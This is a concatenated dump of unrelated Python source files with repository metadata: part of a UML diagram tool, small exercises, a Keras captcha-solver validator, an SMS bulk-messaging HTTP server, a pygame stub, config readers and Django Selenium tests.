self.od.clear()
else:
self.od = ObjectDiagram(self)
# draw the object or stack, then the arrows
drawn = self.od.draw(thing)
self.od.draw_arrows()
# wait for the user
if loop:
self.mainloop()
return Thing.things_drawn
def class_diagram(self, classes=None, loop=True):
"""Create a new object diagram based on the current state.
If a list of classes is provided, only those classes are
shown. Otherwise, all classes that Lumpy know about are shown.
"""
# if there is not already a snapshot, make one
if self.stack == None:
self.make_stack()
# scan the the stack looking for has-a
# relationships (note that we can't do this until the
# stack is complete)
for val in list(self.values.values()):
if isinstance(val, Instance) and val.cls is not None:
val.scan_bindings(val.cls)
# if there is already a class diagram, clear it; otherwise
# create one
if self.cd:
self.cd.clear()
else:
self.cd = ClassDiagram(self, classes)
self.cd.draw()
if loop:
self.mainloop()
return Thing.things_drawn
def get_class_list(self):
"""Returns list of classes that should be drawn in a class diagram."""
t = []
for cls in self.classes:
if not self.is_opaque(cls.classobj):
t.append(cls)
elif cls.parents or cls.childs:
t.append(cls)
return t
class Diagram(object):
"""Parent class for ClassDiagram and ObjectDiagram."""
def __init__(self, lumpy, title):
self.lumpy = lumpy
self.arrows = []
self.tl = lumpy.tl()
self.tl.title(title)
self.tl.geometry('+0+0')
self.tl.protocol("WM_DELETE_WINDOW", self.close)
self.setup()
def ca(self, width=100, height=100, **options):
"""make a canvas for the diagram"""
return self.lumpy.widget(DiagCanvas, width=width, height=height,
**options)
def setup(self):
"""create the gui for the diagram"""
# push the frame for the toplevel window
self.lumpy.pushfr(self.tl)
self.lumpy.col([0, 1])
# the frame at the top contains buttons
self.lumpy.row([0, 0, 1], bg='white')
self.lumpy.bu(text='Close', command=self.close)
self.lumpy.bu(text='Print to file:', command=self.printfile_callback)
self.en = self.lumpy.en(width=10, text='lumpy.ps')
self.en.bind('<Return>', self.printfile_callback)
self.la = self.lumpy.la(width=40)
self.lumpy.endrow()
# the grid contains the canvas and scrollbars
self.lumpy.gr(2, [1, 0])
self.ca_width = 1000
self.ca_height = 500
self.canvas = self.ca(self.ca_width, self.ca_height, bg='white')
yb = self.lumpy.sb(command=self.canvas.yview, sticky=N+S)
xb = self.lumpy.sb(command=self.canvas.xview, orient=HORIZONTAL,
sticky=E+W)
self.canvas.configure(xscrollcommand=xb.set, yscrollcommand=yb.set,
scrollregion=(0, 0, 800, 800))
self.lumpy.endgr()
self.lumpy.endcol()
self.lumpy.popfr()
# measure some sample letters to get the text height
# and set the scale factor for the canvas accordingly
self.canvas.clear_transforms()
bbox = self.canvas.measure(['bdfhklgjpqy'])
self.unit = 1.0 * bbox.height()
transform = ScaleTransform([self.unit, self.unit])
self.canvas.add_transform(transform)
def printfile_callback(self, event=None):
"""Dumps the contents of the canvas to a file.
Gets the filename from the filename entry.
"""
filename = self.en.get()
self.printfile(filename)
def printfile(self, filename):
"""Dumps the contents of the canvas to a file.
filename: string output file name
"""
# shrinkwrap the canvas
bbox = self.canvas.bbox(ALL)
width = bbox.right*self.unit
height = bbox.bottom*self.unit
self.canvas.config(width=width, height=height)
# write the file
self.canvas.dump(filename)
self.canvas.config(width=self.ca_width, height=self.ca_height)
self.la.config(text='Wrote file ' + filename)
def close(self):
"""close the window and exit"""
self.tl.withdraw()
self.lumpy.quit()
def add_arrow(self, arrow):
"""append a new arrow on the list"""
self.arrows.append(arrow)
def draw_arrows(self):
"""draw all the arrows on the list"""
for arrow in self.arrows:
arrow.draw(self)
def update_arrows(self, n=None):
"""update up to n arrows (or all of them is n==None)"""
i = 0
for arrow in self.arrows:
arrow.update()
i += 1
if n and i > n: break
class ObjectDiagram(Diagram):
"""Represents an object diagram."""
def __init__(self, lumpy=None):
Diagram.__init__(self, lumpy, 'Object Diagram')
def draw(self, thing):
"""Draws the top-level Thing."""
drawn = thing.draw(self, Point([2, 2]), flip=1)
# configure the scroll region
self.canvas.scroll_config()
return drawn
def clear(self):
"""Clears the diagram."""
self.arrows = []
self.tl.deiconify()
self.canvas.delete(ALL)
class ClassDiagram(Diagram):
"""Represents a class diagram."""
def __init__(self, lumpy, classes=None):
Diagram.__init__(self, lumpy, 'Class Diagram')
self.classes = classes
def draw(self):
"""Draw the class diagram.
Includes the classes in self.classes,
or if there are none, then all the classes Lumpy has seen.
"""
pos = Point([2, 2])
if self.classes == None:
classes = self.lumpy.get_class_list()
else:
classes = [make_thing(self.lumpy, cls) for cls in self.classes]
# find the classes that have no parents, and find the
# height of each tree
roots = [c for c in classes if c.parents == []]
for root in roots:
root.set_height()
# for all the leaf nodes, compute the distance to
# the parent
leafs = [c for c in classes if c.childs == []]
for leaf in leafs:
leaf.set_depth()
# if we're drawing all the classes, start with the roots;
# otherwise draw the classes we were given.
if self.classes == None:
drawn = self.draw_classes(roots, pos)
else:
drawn = self.draw_classes(classes, pos)
self.draw_arrows()
# configure the scroll region
self.canvas.scroll_config()
def draw_classes(self, classes, pos, tags=tuple()):
"""Draw this list of classes and all their subclasses.
Starts at the given position.
Returns:
list of all classes drawn
"""
p = pos.copy()
alldrawn = []
for c in classes:
drawn = c.cdc.draw(self, p, tags)
alldrawn.extend(drawn)
# author_TODO: change this so it finds the bottom-most bbox in drawn
bbox = c.cdc.get_bbox()
for thing in alldrawn:
if thing is not c:
# can't use bbox.union because it assumes that
# the positive y direction is UP
bbox = union(bbox, thing.get_bbox())
p.y = bbox.bottom + 2
for c in classes:
for d in c.refers:
a = ContainsArrow(self.lumpy, c.cdc, d.cdc)
self.arrows.append(a)
return alldrawn
def union(one, other):
"""Returns a new bbox that covers one and other.
Assumes that the positive y direction is DOWN.
"""
left = min(one.left, other.left)
right = max(one.right, other.right)
top = min(one.top, other.top)
bottom = max(one.bottom, other.bottom)
return BBox([[left, top], [right, bottom]])
###########################
# test code below this line
###########################
def main(script, *args, **kwds):
class Cell:
def __init__(self, car=None, cdr=None):
self.car = car
self.cdr = cdr
def __hash__(self):
return hash(self.car) ^ hash(self.cdr)
def func_a(x):
t = [1, 2, 3]
t.append(t)
y = None
z = 1
long_name = 'allen'
d = dict(a=1, b=2)
func_b(x, y, t, long_name)
def func_b(a, b, s, name):
d = dict(a=1, b=(1, 2, 3))
cell = Cell()
cell.car = 1
cell.cdr = cell
func_c()
def func_c():
t = (1, 2)
c = Cell(1, Cell())
d = {}
d[c] = 7
d[7] = t
d[t] = c.cdr
LUMPY.object_diagram()
func_a(17)
if __name__ == '__main__':
LUMPY = Lumpy()
LUMPY.make_reference()
main(*sys.argv)
|
[
"450096325@qq.com"
] |
450096325@qq.com
|
ceb7cb6f8c86412333ab9392d9aa1fc6635148f2
|
ba6fdc168ce09d187cfd06f086b04981ba04b2b0
|
/taller3.py
|
df847c149532795514dd55686de0adeb80a14387
|
[] |
no_license
|
milerojas22/claseleo
|
09ee08a70001e5d7c29f9e750a50395de7d59ce6
|
abdebc683825f88bd90e9e8492278747c2964874
|
refs/heads/master
| 2020-05-14T11:23:49.645805
| 2019-04-17T17:12:48
| 2019-04-17T17:12:48
| 181,776,618
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
lista=[]
total=0
for n in range(10):
numero =int(input('ingrese un numero: '))
lista.append(numero)
total = total + numero
media = total/10
print(lista)
print('la suma de los numeros es: ',total)
print('la media de los numeros es: ',media)
|
[
"noreply@github.com"
] |
milerojas22.noreply@github.com
|
ff911b73f444a01ff61fb583fc88cb2d68d51835
|
faef34f960744959556f57b4507802e502b77159
|
/mainapp/migrations/0003_auto_20201123_0304.py
|
5f8df5a7242c31edc4a5e13a40e2ff8653fb46ac
|
[] |
no_license
|
m1ger1/roboplatform
|
2437d2122d1fcbde551fe95cd087ea85154ec066
|
1408f453418a28710b89c29aa6cbca6dbe1f0d02
|
refs/heads/master
| 2023-05-27T10:40:25.503728
| 2021-01-11T12:11:59
| 2021-01-11T12:11:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
# Generated by Django 3.1.3 on 2020-11-23 00:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0002_lesson_kit'),
]
operations = [
migrations.RemoveField(
model_name='lesson',
name='kit',
),
migrations.AddField(
model_name='lesson',
name='file_path',
field=models.TextField(blank=True, verbose_name='ะฟััั ะบ ะฟัะตะทะตะฝัะฐัะธะธ'),
),
]
|
[
"brainnugget50@gmail.com"
] |
brainnugget50@gmail.com
|
fdde8e83ba117d2ea66f9539b6c792b0bcbe5cfe
|
1d814ce93d4be5dc4b8ebf8b68225469e6b70e63
|
/captcha/validate.py
|
3d4d5b6c248ff8fc2ad29c91a66d776abf2eac96
|
[
"MIT"
] |
permissive
|
cimi/cscg-2020
|
3296f228af46bcc77ff419cb6a882616c6589e59
|
62377bbad3ed5bcaea5e80e032b73a7dbb73e1d0
|
refs/heads/master
| 2022-10-02T03:15:35.856086
| 2020-06-07T13:34:18
| 2020-06-07T13:34:18
| 268,373,490
| 4
| 4
| null | 2020-05-31T22:20:00
| 2020-05-31T22:16:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,772
|
py
|
from keras.models import load_model
from keras.preprocessing import image
from sklearn.preprocessing import LabelEncoder
from processor import split_image
import cv2
import numpy as np
import os
def get_encodings():
letters = []
for filename in os.listdir('training/letters/'):
if '-' not in filename:
continue
letter = filename.split('-')[0]
letters.append(letter)
encoder = LabelEncoder()
labels = encoder.fit_transform(letters)
encodings = {}
for idx, l in enumerate(letters):
encodings[labels[idx]] = l
return encodings
def decode_results(results, encodings):
guess = ""
for result in results:
max_idx, max_val = -1, -1
for idx, prob in enumerate(result):
if prob > max_val:
max_idx, max_val = idx, prob
guess += encodings[max_idx]
return guess
def validate(model_file):
validation_dir = "captchas/"
encodings = get_encodings()
model = load_model(model_file)
total, success = 0, 0
for filename in os.listdir(validation_dir):
total += 1
letters = split_image(validation_dir + filename)
captcha = filename.split(".")[0]
tmpfile = "tmp-letter.png"
images = []
for l in letters:
cv2.imwrite(tmpfile, l)
img = image.load_img(tmpfile, target_size=[30, 30, 1], color_mode='grayscale')
img = image.img_to_array(img)
img = img/255
images.append(img)
results = model.predict(np.array(images), verbose=0)
guess = decode_results(results, encodings)
if guess == captcha:
success += 1
success_percentage = (success / total) * 100
if success_percentage < 99:
print(f"๐ซ {model_file} success too low: {success_percentage:.2f}%")
else:
print(f"โ
{model_file} is a great success: {success_percentage:.2f}%")
|
[
"alexandru.ciminian@datadoghq.com"
] |
alexandru.ciminian@datadoghq.com
|
d28eff1868de620720a05348c3fdaf9a7e1b03c0
|
028a5df3cfe1560f007a8f1b8526bd53a911f913
|
/inf3331/assignment3/addition_testing.py
|
569cf2cd5df0960861126d1431c429ca3baf762e
|
[] |
no_license
|
danielosen/code
|
243b55ef896af6ac2de9f9ada4221bb9f201c196
|
05d45c8299fda9711f747d5c4c7051d11d11a0ee
|
refs/heads/master
| 2021-01-23T05:34:53.889322
| 2017-05-31T18:17:59
| 2017-05-31T18:17:59
| 92,972,954
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 955
|
py
|
from my_unit_testing import UnitTest
def better_addition(a, b, num_rechecks=2):
"""Returns sum of a, b, but double checks answer several times."""
sum_computations = [a + b for n in range(num_rechecks)]
for n in range(num_rechecks):
if sum_computations[n] != sum_computations[n-1]:
print("Hang on, let me recheck that")
return better_addition(a, b, num_rechecks)
return sum_computations[0] # if all computations match, return whichever
num_tests = 0
num_passed = 0
for a, b, n, r in [(4, 7, 0, 11),
(4, 7, 4, 11),
(2, 2, 2, 4)]:
test = UnitTest(better_addition, # UnitTest() calls the __init__ method
[a, b], {"num_rechecks": n}, r)
num_tests+= 1
if test(): # calls the __call__ method
num_passed += 1
print("{}/{} tests passed".format(num_passed, num_tests))
|
[
"noreply@github.com"
] |
danielosen.noreply@github.com
|
f007ba5d6aa59a34b0b98a5351546bea5223f172
|
212d3a4ccd591a741df36e8d073b1be8b09b00cd
|
/BackEnd/server.py
|
5b51641911158c741f1b9f861f98fa4972f9c095
|
[] |
no_license
|
BITNP/group-message-system
|
a9f7cd81ad7b79b1d67e80a6f456791dcf410b12
|
0f6354b3bf567fe0ed3b604641b9d942696b50d7
|
refs/heads/master
| 2020-03-28T06:39:10.849698
| 2018-10-30T18:26:27
| 2018-10-30T18:26:27
| 147,850,354
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,871
|
py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import time
import json
import requests
import MySQLdb
import os
import hashlib
import databaseIO.databaseIO as dbIO
HOST = ''
PORT = 29999
ADDR = (HOST, PORT)
# HTTP/1.1 404 Not Found
# Server: 360wzws
# Date: Fri, 29 Jun 2018 15:33:21 GMT
# Content-Type: text/html
# Content-Length: 479
# Connection: close
# X-Powered-By-360WZB: wangzhan.360.cn
# ETag: "5a7e7448-1df"
# WZWS-RAY: 114-1530315201.377-s9lfyc2
try:
with open('config.json') as f:
config_dict = json.load(f)
except:
print('่ฏปๅ config.json ๅคฑ่ดฅ,่ฏทๆญฃ็กฎ้
็ฝฎ')
exit(1)
apikey = os.getenv('YUNPIAN_APIKEY') or config_dict['yunpian']['apikey']
# DBHOSTNAME, DBUSERNAME,
# DBPASSWORD, DBDBNAME, DBPORT
DBHOSTNAME = os.getenv('DB_HOSTNAME') or config_dict['databaseIO']['host']
DBUSERNAME = os.getenv('DB_USERNAME') or config_dict['databaseIO']['username']
DBPASSWORD = os.getenv('DB_PASSWORD') or config_dict['databaseIO']['password']
DBDB = os.getenv('DB_DB') or config_dict['databaseIO']['db']
DBPORT = os.getenv('DB_PORT') or config_dict['databaseIO']['port']
PORT = os.getenv('SERVER_PORT')or config_dict['server_port']
LATEST_QT_VERSION = os.getenv(
'LATEST_QT_VERSION')or config_dict['latest_qt_version'] or '0.0.0'
# start_time = '2018-06-11 00:00:00'
# end_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
def replaceText(raw_text, replaceTo: list, whereToReplace: list):
text = raw_text
for i in range(len(whereToReplace)):
text = text.replace(whereToReplace[i], replaceTo[i])
return text
def process_resquest(dict_data):
code = str(dict_data['request_code'])
if code == '1.5':
response = requests.post(
'https://sms.yunpian.com/v2/sms/get_record.json', data=dict_data)
elif code == '1.4':
"""
ๆณจๆ๏ผmobile่ฆไปฅ้ๅทๅๅฒๅญ็ฌฆไธฒๅฝขๅผไผ ๅ
ฅ๏ผไป
ไบ็็ฝ๏ผ
param่ฆไปฅๅ่กจ็ๅฝขๅผไผ ๅ
ฅ๏ผไบ็็ฝ,ไนๅฐฑๆฏtpl_value
"""
payload_list = []
text_list = [replaceText(
dict_data['content'], param, dict_data['replace']) for param
in dict_data['param']]
print('HERE')
for mobile, text in zip(dict_data['mobile'], text_list):
payload_list.append(dict(apikey=dict_data['apikey'],
mobile=mobile,
text=text)
)
# payload = dict(apikey=dict_data['apikey'],
# mobile=','.join(dict_data['mobile'])
# )
# text_list = [replaceText(
# dict_data['content'], param, dict_data['replace']) for param in dict_data['param']]
# payload['text'] = ','.join(text_list)
print(payload_list)
dict_result = dict(total_count=0, total_fee=0.00, unit="RMB", data=[])
for payload in payload_list:
time.sleep(0.1)
response = requests.post(
'https://sms.yunpian.com/v2/sms/single_send.json', data=payload
)
# response = requests.post(
# 'https://sms.yunpian.com/v2/sms/multi_send.json', data=payload
# )
result = response.json()
# ๅผๅธธๅค็
print(response.json())
if 'http_status_code' in result: # api่ฐ็จๆญฃ็กฎ๏ผไฝๆๅ
ถไป้่ฏฏ
# ็ดๆฅๆทปๅ ไธๆกๅคฑ่ดฅ่ฎฐๅฝๅฐ็ปๆไธญ
# ๆณจๆ๏ผ ่ฟไธชๅฑไบๅผๅธธ้่ฏฏ๏ผๅนถ้่ถ
่ฟๅญๆฐ้ๅถไน็ฑป็้่ฏฏ
dict_result['data'].append(dict(
code=1,
msg=result['detail'],
count=0,
fee=0.0,
unit="RMB",
mobile=payload['mobile'],
sid=10101010101
))
print('api่ฐ็จๆญฃ็กฎ๏ผไฝๆๅ
ถไป้่ฏฏ', payload, result)
continue
return '{"code":234,"msg":"'+result['detail']+'"}'
#
dict_result['data'].append(result)
dict_result['total_count'] += 1
dict_result['total_fee'] += result['fee']
result_data = [dict(sid=i['sid'], param=str(j), mobile=i['mobile'],
result=i['code'], errmsg=i['msg'], fee=i['fee'])
for i, j in zip(dict_result['data'], dict_data['param'])
]
db.Send(dict_data['id'], '', 1, None, dict_data['content'],
dict_result['total_fee'], dict_result['total_count'], result_data)
return json.dumps(dict_result, ensure_ascii=False)
elif code == '1.1':
response = requests.post(
'https://sms.yunpian.com/v2/tpl/get_default.json', data=dict_data)
elif code == '1.2':
response = requests.post(
'https://sms.yunpian.com/v2/tpl/get.json', data=dict_data)
print(response.json())
# ๆ็
งtplIDList ๅค็ TODO
tpl_list = db.getUserTpl(dict_data['id'], 1)
print('ๆฐๆฎๅบไธญๅญๅจ็', tpl_list)
result = response.json()
# ๅผๅธธๅค็
if 'http_status_code' in result:
return json.dumps(result, ensure_ascii=False)
if isinstance(result, dict):
result = [result]
# ไธ้ขไธๆก่ฏญๅฅ่ตทๅฐ่ฟๆปคไฝ็จ๏ผๆณจๆ็ไบง็ฏๅขไธญ่ฆๅๆถๆณจ้
result = list(filter(lambda x: str(x['tpl_id']) in tpl_list, result))
return json.dumps(result, ensure_ascii=False)
elif code == '1.3':
response = requests.post(
'https://sms.yunpian.com/v2/tpl/add.json', data=dict_data)
dict_result = response.json()
print(dict_result)
if 'http_status_code' in dict_result: # api่ฐ็จๆญฃ็กฎ๏ผไฝๆๅ
ถไป้่ฏฏ
return '{"code":233,"msg":"'+dict_result['detail']+'"}'
affect_row_num = db.addUserTpl(
dict_data['id'], dict_result['tpl_id'], 1, dict_result['tpl_content'],
None, dict_result['check_status'], None)
print(affect_row_num)
return '{"success":true}'
elif code == '6':
res = db.checkSendResult(dict_data['id'])
return json.dumps(res, ensure_ascii=False)
elif code == '7':
fee, paid, *_ = db.getUserInfo(dict_data['id'])
return json.dumps(dict(fee=float(fee), paid=float(paid)))
else:
return None
return response.text
class MyRequestHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
super(MyRequestHandler, self).__init__(request, client_address, server)
def _set_headers(self, status=True):
if not status:
self.send_response(404)
self.send_header('Content-type', 'application/json')
self.end_headers()
return
else:
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def process_json(self, raw_data):
try:
dict_data = json.loads(raw_data.decode('utf-8'))
except:
self._set_headers(False)
# ๅผๅธธๅค็ TODO
print('=='*10, '\n'+raw_data.decode('utf-8')+'\n', '=='*10)
json.loads(raw_data)
return None, False
else:
dict_data.update(
dict(apikey=apikey))
return dict_data, True
def _check_dict(self, data: dict, *args):
for i_str in args:
if i_str not in data:
self._set_headers(False)
string = '{"code":251,"msg":"'+i_str+' not in json"}'
self.wfile.write(string.encode())
return False
return True
def do_GET(self):
print(str(self.path), str(self.headers))
self._set_headers()
# self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
# ๅ็ปญๅฏ่ฝ่ฆไฝฟ็จ้
็ฝฎๆไปถ
json_string = '{"api":["ไบ็็ฝ(ไธๆฏๆๅๅค)","่
พ่ฎฏ๏ผๆฏๆๅๅค๏ผ"],"new_qt_version":"' + \
LATEST_QT_VERSION+'"}'
self.wfile.write(json_string.encode())
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
# step 0 : ๅค็jsonๆฐๆฎ๏ผ่ฝฌๅๆๅญๅ
ธ๏ผๅผๅธธๅ็ดๆฅ้ๅบ
# <--- Gets the size of data
content_length = int(self.headers['Content-Length'])
# <--- Gets the data itself
post_data = self.rfile.read(content_length)
dict_data, status = self.process_json(post_data)
if not status:
self.wfile.write('{"code":250,"msg":"้jsonๆ ผๅผ"}'.encode('utf-8'))
return
# step 1 : ไปๆฐๆฎๅบ้ช่ฏ่บซไปฝ๏ผๆๅไฟกๆฏ
if not self._check_dict(dict_data, "username", "password", "request_code"):
return
myid = db.identifyUser(dict_data['username'], dict_data['password'])
if myid is not None:
myinfo = db.getUserInfo(myid)
print('get info :', myinfo)
print('้ช่ฏๆๅ')
else:
self._set_headers(False)
self.wfile.write(
'{"code":252,"msg":"error username or password"}'.encode('utf-8'))
return
# print(hashlib.md5("whatever your string is".encode('utf-8')).hexdigest())
# step 2 : ๅค็ๅ็ปญไฟกๆฏ๏ผๅ้api
dict_data.update(dict(apikey=apikey, id=myid))
print(dict_data)
# step 3 : ๅฆๆๆ้่ฆ๏ผ่ฟๆปคๅๅบ็ปๆๅนถ่ฟๅ๏ผๅฆๆๆฒกๆ้่ฆ๏ผ็ดๆฅ่ฟๅ
response_text = process_resquest(
dict_data)
if response_text is None:
self._set_headers(False)
self.wfile.write(
'{"code":254,"msg":"error request_code"}'.encode())
return
print(response_text)
self._set_headers()
self.wfile.write(response_text.encode()) # ๅๅ็ซฏๅไผ ๆฐๆฎ็ๆ ผๅผ
def run(server_class=HTTPServer, handler_class=MyRequestHandler):
"""
่ฟ่ก็ๅฌ
:param server_class=HTTPServer:
:param handler_class=MyRequestHandler:
"""
httpd = server_class(ADDR, handler_class)
print('start waiting for connection...')
httpd.serve_forever()
httpd.server_close()
def init():
"""
ๅๅงๅๆฐๆฎๅบ
"""
try:
print(DBHOSTNAME, DBUSERNAME,
DBPASSWORD, DBDB, int(DBPORT))
db = dbIO.databaseIO(DBHOSTNAME, DBUSERNAME,
DBPASSWORD, DBDB, int(DBPORT))
except MySQLdb.OperationalError as e:
print('ๆฐๆฎๅบ่ฟๆฅๅคฑ่ดฅ', e)
exit(1)
return None
else:
return db
if __name__ == '__main__':
time.sleep(7)
db = init()
run()
|
[
"loveress01@gmail.com"
] |
loveress01@gmail.com
|
ec664ac41515769e3c89fadff9679e0e257cfc80
|
275a53900c00f5601ea4ee748a5234c079cf7d03
|
/python/dimensions.py
|
28367c205e94a8d0388a5313e0660af577df414a
|
[] |
no_license
|
yangzhi1992/com.yangzhi
|
cb3f6a32b334aedb07920f46be859ff71305ef41
|
5125e83b097fe4627b6c764d8cf8c80a2c433020
|
refs/heads/master
| 2022-12-24T13:49:00.004808
| 2021-02-05T08:32:53
| 2021-02-05T08:32:53
| 94,555,037
| 0
| 0
| null | 2022-12-15T23:51:41
| 2017-06-16T15:03:39
|
Python
|
UTF-8
|
Python
| false
| false
| 208
|
py
|
dimensions = (200, 50)
print(dimensions[0])
print(dimensions[1])
for dimension in dimensions: print(dimension)
#ไฟฎๆนๅ
็ปๅ้
dimensions = (400, 100)
for dimension in dimensions: print(dimension)
|
[
"18255305960@163.com"
] |
18255305960@163.com
|
c104c748d49c8886c7bd2820bfa0e1350aadf4d0
|
42f73952d74b54c09d2125e70d4c368914d8b6e0
|
/alien_invasion.py
|
bd62aadff61926bc0c4aa7d08b907d09c52caa5a
|
[] |
no_license
|
satishraopublic/alieninvasion_python_learning
|
4b4f0bc780afe38f3aaf8e26cea34b054fbe65bc
|
a0bb1f6a83f75f70b70e16692800f96b2b862408
|
refs/heads/master
| 2020-11-26T17:34:24.539792
| 2019-12-20T00:26:21
| 2019-12-20T00:26:21
| 229,160,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,195
|
py
|
"""This module does blah blah."""
import sys
import pygame
from settings import Settings
from ship import Ship
class AlienInvasion:
"""Overall class to manage game assets and behavior."""
def __init__(self):
"""Initialize the game, create game resources """
pygame.init()
self.settings = Settings()
self.screen = pygame.display.set_mode((self.settings.screen_width, self.settings.screen_height))
pygame.display.set_caption("Alien Invasion")
self.ship = Ship(self)
def run_game(self):
"""Start the main loop for the game."""
while True:
# Watch for keyboard and mouse events.
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
# Redraw the screen during each pass through the loop.
self.screen.fill(self.settings.bg_color)
self.ship.blitme()
# Make the most recently drawn screen visible.
pygame.display.flip()
if __name__ == '__main__':
# Make a game instance, and run the game.
ai = AlienInvasion()
ai.run_game()
|
[
"Satish.Rao@hyland.com"
] |
Satish.Rao@hyland.com
|
18f042bb0f084e97263613d6449e4ee812df322e
|
d3e4b3e0d30dabe9714429109d2ff7b9141a6b22
|
/Visualization/GeometricDistributionVisualization.py
|
fbfed65f86cbcd01ebecf2fa1232a8b51ecbb3e1
|
[
"MIT"
] |
permissive
|
SymmetricChaos/NumberTheory
|
184e41bc7893f1891fa7fd074610b0c1520fa7dd
|
65258e06b7f04ce15223c1bc0c2384ef5e9cec1a
|
refs/heads/master
| 2021-06-11T17:37:34.576906
| 2021-04-19T15:39:05
| 2021-04-19T15:39:05
| 175,703,757
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
from Combinatorics.Distributions import GeometricDist
import matplotlib.pyplot as plt
D1 = GeometricDist(.7)
x1 = [i for i in range(5)]
y1 = [D1[i] for i in x1]
plt.scatter(x1,y1)
|
[
"ajfraebel@gmail.com"
] |
ajfraebel@gmail.com
|
57afc4a0527aaaeec405e6b4f5aac56b2d626423
|
7f7f144d393f41080df4e9b1a56781fa9300ffc4
|
/config.py
|
23672005dc6dba5a409a10c8d6a7292ce3966003
|
[] |
no_license
|
kusl/myflaskproject
|
4377295614e167524c14a6fe114b3eccdaaaccb6
|
badff41d75f87b885d4edf03d7a0eb8f3d428c87
|
refs/heads/master
| 2022-12-24T14:47:59.786155
| 2018-11-04T20:25:01
| 2018-11-04T20:25:01
| 155,693,473
| 0
| 0
| null | 2021-03-20T00:17:43
| 2018-11-01T09:42:58
|
Python
|
UTF-8
|
Python
| false
| false
| 907
|
py
|
#!/usr/bin/python
from configparser import ConfigParser
def config(filename='database.ini', section='postgresql'):
# create a parser
parser = ConfigParser()
# read config file
parser.read(filename)
# get section, default to postgresql
db = {}
if parser.has_section(section):
params = parser.items(section)
for param in params:
db[param[0]] = param[1]
else:
raise Exception('Section {0} not found in the {1} file'.format(section, filename))
return db
def youtube(filename='database.ini', section='youtube'):
parser = ConfigParser()
parser.read(filename)
yt = {}
if parser.has_section(section):
params = parser.items(section)
for param in params:
yt[param[0]] = param[1]
else:
raise Exception('Section {0} not found in the {1} file'.format(section, filename))
return yt
|
[
"kushaldeveloper@gmail.com"
] |
kushaldeveloper@gmail.com
|
2708b1428543747ec56290be32c256416258be61
|
3ce31eb855c6427a4ec9e803029949461b969adc
|
/fts/tests.py
|
a665637c279b1b10310058c31eb92358b35b3b18
|
[] |
no_license
|
pcp135/exercise
|
93b98aadfe3a955807ce6467361357f90fcd352b
|
4addbc308ec6b71cab4f127741bc9cbaf0ebd3a8
|
refs/heads/master
| 2021-01-25T10:29:02.912759
| 2012-07-28T22:06:46
| 2012-07-28T22:06:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,427
|
py
|
from django.test import LiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import login
class ExerciseTest(LiveServerTestCase):
fixtures = ['adminUser.json']
def setUp(self):
self.browser = webdriver.Firefox()
self._setup_workouts_via_admin()
def tearDown(self):
self.browser.quit()
pass
def _setup_workouts_via_admin(self):
self.browser.get(self.live_server_url + '/admin/')
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(login.un)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(login.pw)
password_field.send_keys(Keys.RETURN)
self.browser.find_element_by_link_text('Measures').click()
self.browser.find_element_by_link_text('Add measure').click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Length')
save_button = self.browser.find_element_by_name("_addanother")
save_button.click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Width')
save_button = self.browser.find_element_by_name("_save")
save_button.click()
self.browser.find_element_by_link_text('Getfit').click()
self.browser.find_element_by_link_text('Exercises').click()
self.browser.find_element_by_link_text('Add exercise').click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Jumping')
self.browser.find_elements_by_tag_name("option")[0].click()
save_button = self.browser.find_element_by_name("_addanother")
save_button.click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Reaching')
self.browser.find_elements_by_tag_name("option")[1].click()
save_button = self.browser.find_element_by_name("_save")
save_button.click()
self.browser.find_element_by_link_text('Getfit').click()
self.browser.find_element_by_link_text('Workouts').click()
self.browser.find_element_by_link_text('Add workout').click()
self.browser.find_element_by_xpath("//select[@name='exercise']/option[@value='1']").click()
self.browser.find_element_by_link_text('Today').click()
self.browser.find_element_by_link_text('Now').click()
self.browser.find_element_by_xpath("//select[@name='score_set-0-measure']/option[@value='1']").click()
result = self.browser.find_element_by_xpath("//input[@name='score_set-0-result']")
result.send_keys('12345')
save_button = self.browser.find_element_by_name("_addanother")
save_button.click()
self.browser.find_element_by_xpath("//select[@name='exercise']/option[@value='2']").click()
self.browser.find_element_by_link_text('Today').click()
self.browser.find_element_by_link_text('Now').click()
self.browser.find_element_by_xpath("//select[@name='score_set-0-measure']/option[@value='2']").click()
result = self.browser.find_element_by_xpath("//input[@name='score_set-0-result']")
result.send_keys('67890')
save_button = self.browser.find_element_by_name("_save")
save_button.click()
self.browser.find_element_by_link_text('Log out').click()
def test_flow_through_the_site(self):
#Visit main page
self.browser.get(self.live_server_url)
body = self.browser.find_element_by_tag_name('body')
#Check all the admin setup stuff is shown
self.assertIn('Workouts', body.text)
self.assertIn('Jumping', body.text)
self.assertIn('Reaching', body.text)
#Visit the link for the first admin setup exercise
self.browser.find_element_by_link_text('Jumping').click()
body = self.browser.find_element_by_tag_name('body')
#and confirm details are correct
self.assertIn('Jumping', body.text)
self.assertIn('Length', body.text)
self.assertIn('12345', self.browser.page_source)
self.browser.get(self.live_server_url)
#now visit the second
self.browser.find_element_by_link_text('Reaching').click()
body = self.browser.find_element_by_tag_name('body')
#and check everything is there
self.assertIn('Reaching', body.text)
self.assertIn('Width', body.text)
